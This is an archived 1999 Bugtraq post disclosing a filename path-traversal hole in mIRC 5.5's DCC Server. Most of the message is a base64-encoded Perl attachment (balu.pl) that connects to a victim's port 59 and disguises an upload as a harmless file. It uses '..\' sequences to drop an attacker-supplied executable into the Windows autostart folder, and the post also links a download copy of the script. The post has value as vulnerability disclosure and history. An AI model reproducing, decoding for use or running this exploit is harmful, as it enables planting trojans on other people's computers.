Bugtraq mailing list archives

Mirc 5.5 'DCC Server' hole

From: spikeman () MYSELF COM (Spikeman)
Date: Sun, 24 Jan 1999 08:44:54 -0800


  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime () docserver cac washington edu for more info.

--1675104969-1444556010-917196294=:17684
Content-Type: TEXT/PLAIN; charset=US-ASCII

while talking with typo he gave me this mIRC bug as it says in the file
# bug description: mirc 5.5's newly introduced dcc server feature doesn't
# filter metachars(such as . and \) from sent filenames. this script
fakes the
# sending of a harmless file and then puts malicious file in a wanted
# destination dir on the same harddrive (autostart dir is a good choice)

If you have problems with the attchmnt i have the file at
http://spikeman.genocide2600.com/balu.pl

      ___
     /\  \ Spikeman
    /::\  \
   /:/\:\  \ http://spikeman.genocide2600.com/
  _\:\~\:\  \ Spikeman's DoS Site
 /\ \:\ \:\__\
 \:\ \:\ \/__/ spikeman () myself com
  \:\ \:\__\
   \:\/:/  /
    \::/  /
     \/__/

--1675104969-1444556010-917196294=:17684
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="balu.pl"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.05.9901240844540.17684 () adric genocide2600 com>
Content-Description:
Content-Disposition: attachment; filename="balu.pl"

IyEvdXNyL2Jpbi9wZXJsDQojIE1pcmMgNS41ICdEQ0MgU2VydmVyJyBwYXRo
YnVnKGJhbHUpIHRvb2wuIC0gdHlwb0BpbmZlcm5vLnR1c2N1bHVtLmVkdQ0K
Iw0KIyBidWcgZGVzY3JpcHRpb246IG1pcmMgNS41J3MgbmV3bHkgaW50cm9k
dWNlZCBkY2Mgc2VydmVyIGZlYXR1cmUgZG9lc24ndA0KIyAgZmlsdGVyIG1l
dGFjaGFycyhzdWNoIGFzIC4gYW5kIFwpIGZyb20gc2VudCBmaWxlbmFtZXMu
IHRoaXMgc2NyaXB0IGZha2VzIHRoZQ0KIyAgc2VuZGluZyBvZiBhIGhhcm1s
ZXNzIGZpbGUgYW5kIHRoZW4gcHV0cyBtYWxpY2lvdXMgZmlsZSBpbiBhIHdh
bnRlZA0KIyAgZGVzdGluYXRpb24gZGlyIG9uIHRoZSBzYW1lIGhhcmRkcml2
ZSAoYXV0b3N0YXJ0IGRpciBpcyBhIGdvb2QgY2hvaWNlKQ0KIw0KIyB1c2Fn
ZTogLi9iYWx1LnBsIDxob3N0bmFtZT4gPChhbnkpbmljaz4gPGZpbGUvdHJv
amFuIHRvIHNlbmQobG9jYWwpPiANCiMgICAgICAgICAgICAgICAgICA8ZmFr
ZSBmaWxlbmFtZShpbWFnaW5hcnkpPiA8cGF0aCtmaWxlbmFtZSAocmVtb3Rl
KT4NCiMNCiMNCg0KdXNlIElPOjpTb2NrZXQ7DQoNCiRob3N0ID0gc2hpZnQg
b3IgZGllICduZWVkIGEgaG9zdCB0byBjb25uZWN0IHRvLic7IGNob21wICRo
b3N0Ow0KJG5pY2sgPSBzaGlmdCBvciBkaWUgJ25lZWQgc291cmNlIG5pY2sg
KGUuZy4gc2F0YW4pJzsgY2hvbXAgJG5pY2s7DQokZmlsZSA9IHNoaWZ0IG9y
IGRpZSAnbmVlZCBhIGZpbGUgdG8gc2VuZCAoZWc6IC4vZXZpbC5leGUpLic7
IGNob21wICRmaWxlOw0KJGZmaWxlID0gc2hpZnQgb3IgZGllICduZWVkIGEg
ZmFrZSBmaWxlbmFtZSB0byBzZW5kIChlZzogdGVlbjUuanBnKS4nOyBjaG9t
cCAkZmZpbGU7DQokcmZpbGUgPSBzaGlmdCBvciBkaWUgJ25lZWQgcmVtb3Rl
IGZpbGVuYW1lK3BhdGgsIGVnKGluY2x1ZGluZyB0aGUgXCdcJ3MpOiBcJ3dp
bmRvd3Ncc3RhcnRtfjFccHJvZ3JhfjFcYXV0b3N0YXJ0XGJsYS5leGVcJyAo
d2hpY2ggaXMgdGhlIHBhdGggb2YgYXV0b3N0YXJ0IGluIGdlcm1hbiB3aW45
NSknOw0KY2hvbXAgJHJmaWxlOw0KKCRkZXYsJGlubywkbW9kZSwkbmxpbmss
JHVpZCwkZ2lkLCRyZGV2LCRzaXplLCRhdGltZSwkbXRpbWUsJGN0aW1lLCRi
bGtzaXplLCRibG9ja3MpID0gc3RhdCgkZmlsZSk7DQokbXlzb2NrID0gSU86
OlNvY2tldDo6SU5FVC0+bmV3KCIkaG9zdDo1OSIpIG9yIGRpZSAiY2FuJ3Qg
Y29ubmVjdCB0byAkaG9zdDo1OSI7DQoNCiMkbXlzb2NrLT5zZW5kKCIxMDAg
YmxhXG4iKTsNCmRlZmluZWQgJG15c29jayAtPiBzZW5kKCIxMjAgJG5pY2sg
JHNpemUgJGZmaWxlIiAuICcgJyB4IDc0IC4gICdcLi5cLi5cLi5cLi5cLi5c
XCcgLiAkcmZpbGUpOw0KDQpGT086IHdoaWxlIChkZWZpbmVkICRteXNvY2sp
IHsNCiAgJG15c29jay0+cmVjdigkYmxhLDEpOw0KICBsYXN0IEZPTyBpZiAk
YmxhIGVxICJcbiI7DQogICRmb28gLj0gJGJsYTsNCiAgZ290byBleGl0IGlm
ICghZGVmaW5lZCAkbXlzb2NrKTsNCiAgZ290byBleGl0IGlmICghZGVmaW5l
ZCAkYmxhKTsNCn0NCg0KKCRmMSwkZjIsJGYzKSA9IHNwbGl0KC8gLywkZm9v
LCAzKTsNCnByaW50ICJOaWNrIG9mIHJlY2VpdmVyOiAkZjIgLSBSZXN1bWUg
cmVxdWVzdGVkIGF0IG9mZnNldDogJGYzXG4iOw0KaWYgKCRmMyAhPSAwKSB7
IHByaW50ICJFcnJvcjogJGYyIHdhbnRzIHRvIHJlc3VtZS4uIGFib3J0aW5n
ISBUcnkgYW5vdGhlciByZW1vdGUgZmlsZW5hbWUuXG4iOyBnb3RvIGV4aXQ7
IH0NCnByaW50ICJzZW5kaW5nLi4uICI7DQpvcGVuKEZJTEUsJGZpbGUpOw0K
d2hpbGUgKDxGSUxFPikgew0KICAkbXlzb2NrLT5zZW5kKCRfKTsNCn0NCg0K
ZXhpdDoNCnByaW50ICJkb25lLlxuIjsgDQokbXlzb2NrLT5jbG9zZTsNCg==
--1675104969-1444556010-917196294=:17684--

Current thread:

Re: Sendmail 8.8.x/8.9.x bugware, (continued)
- - Re: Sendmail 8.8.x/8.9.x bugware Alan Brown (Jan 17)
- Re: Sendmail 8.8.x/8.9.x bugware John Mizzi (Jan 17)
  - Personal web server kiborg (Jan 17)
    - Re: Personal web server Dave Pifke (Jan 18)
    - Another web-based mail reader hole Dave Pifke (Jan 18)
    - Re: Another web-based mail reader hole Peter van Dijk (Jan 19)
  - Re: Sendmail 8.8.x/8.9.x bugware Michal Zalewski (Jan 18)
- Re: Sendmail 8.8.x/8.9.x bugware Nic Bellamy (Jan 19)
- NetBSD Security Advisory 1999-001: select(2)/accept(2) race Luke Mewburn (Jan 20)
  - Re: NetBSD Security Advisory 1999-001: select(2)/accept(2) race Alan Cox (Jan 23)
    - Mirc 5.5 'DCC Server' hole Spikeman (Jan 24)
    - Re: Mirc 5.5 'DCC Server' hole Sandro Jurado (Jan 26)
    - Re: NetBSD Security Advisory 1999-001: select(2)/accept(2) race Casper Dik (Jan 25)
    - Announcement: Wietse's FTP site has moved Wietse Venema (Jan 25)
- Keeping Solaris up-to-date: summary John RIddoch (Jan 20)
- FW: Personal web server - Temporary Fix Ollie Whitehouse (Jan 20)
- Nobo and Netbuster Dos Wolfgang Gassner (Jan 20)
  - Re: Nobo and Netbuster Dos Flavio Veloso (Jan 21)
- Quake 2 Server Crash Leif Sawyer (Jan 20)
- NetBSD Security Advisory 1999-001: select(2)/accept(2) race D. J. Bernstein (Jan 20)
- Sendmail 8.8.x/8.9.x bugware Gregory Neil Shapiro (Jan 20)

(Thread continues...)